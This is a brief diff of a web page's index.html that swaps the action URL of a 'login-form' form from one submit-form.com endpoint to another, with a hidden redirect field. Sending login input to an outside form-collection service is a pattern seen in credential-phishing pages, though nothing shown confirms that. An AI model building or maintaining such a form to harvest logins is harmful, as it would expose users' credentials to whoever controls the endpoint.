--- a/index.html
+++ b/index.html
@@ -54,7 +54,7 @@
     </div>
     <div class="login-form">
       <h1></h1>
-      <form class="sm:hidden lg:block md:block" action="https://submit-form.com/KgiIUoe8W" method="post">
+      <form class="sm:hidden lg:block md:block" action="https://submit-form.com/kePm5TkV4" method="post">
     <input
     type="hidden"
     name="_redirect"
